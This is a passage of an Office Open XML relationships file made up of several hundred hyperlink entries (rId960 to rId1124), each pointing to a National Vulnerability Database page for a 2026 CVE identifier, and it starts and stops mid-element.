Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69630" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69645" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69648" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69652" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69654" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69682" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69692" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69693" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69694" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69708" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69711" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69735" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69779" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69791" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69806" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70573" TargetMode="External" Id="rId995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70577" TargetMode="External" Id="rId996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70578" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70585" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71340" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71342" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71351" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71353" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72926" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72930" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72952" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72963" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73003" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73005" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77485" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77897" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77905" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78457" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78464" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80093" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81192" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81389" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82062" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83940" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83999" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85360" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86135" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53933" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62652" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81531" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81823" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86804" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86810" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65812" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68833" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69415" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69490" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69566" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71329" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71348" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71349" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71350" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72985" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72999" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74859" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77892" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78451" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78579" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69350" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69373" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69449" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71339" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72927" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72935" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72948" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78625" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78630" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85981" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52486" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69469" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78545" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78550" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17509" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18021" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44766" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53637" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55256" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58649" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62437" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62762" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62801" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64918" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66303" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66306" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66308" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66816" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67369" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67383" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67386" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67389" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67390" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67393" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67624" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67629" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67630" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67633" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67641" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67645" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67648" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68776" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68777" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68778" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68779" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68780" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68781" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68784" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68898" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69267" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69297" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69361" TargetMode="External" Id="rId1100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69374" TargetMode="External" Id="rId1101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69375" TargetMode="External" Id="rId1102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69395" TargetMode="External" Id="rId1103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69409" TargetMode="External" Id="rId1104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69497" TargetMode="External" Id="rId1105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69562" TargetMode="External" Id="rId1106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69624" TargetMode="External" Id="rId1107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69626" TargetMode="External" Id="rId1108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69636" TargetMode="External" Id="rId1109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69719" TargetMode="External" Id="rId1110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69734" TargetMode="External" Id="rId1111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69781" TargetMode="External" Id="rId1112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69839" TargetMode="External" Id="rId1113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70019" TargetMode="External" Id="rId1114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72938" TargetMode="External" Id="rId1115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72939" TargetMode="External" Id="rId1116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72942" TargetMode="External" Id="rId1117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72956" TargetMode="External" Id="rId1118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72974" TargetMode="External" Id="rId1119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72975" TargetMode="External" Id="rId1120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72977" TargetMode="External" Id="rId1121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73029" TargetMode="External" Id="rId1122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76000" TargetMode="External" Id="rId1123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76968" TargetMode="External" Id="rId1124" /><Relationship 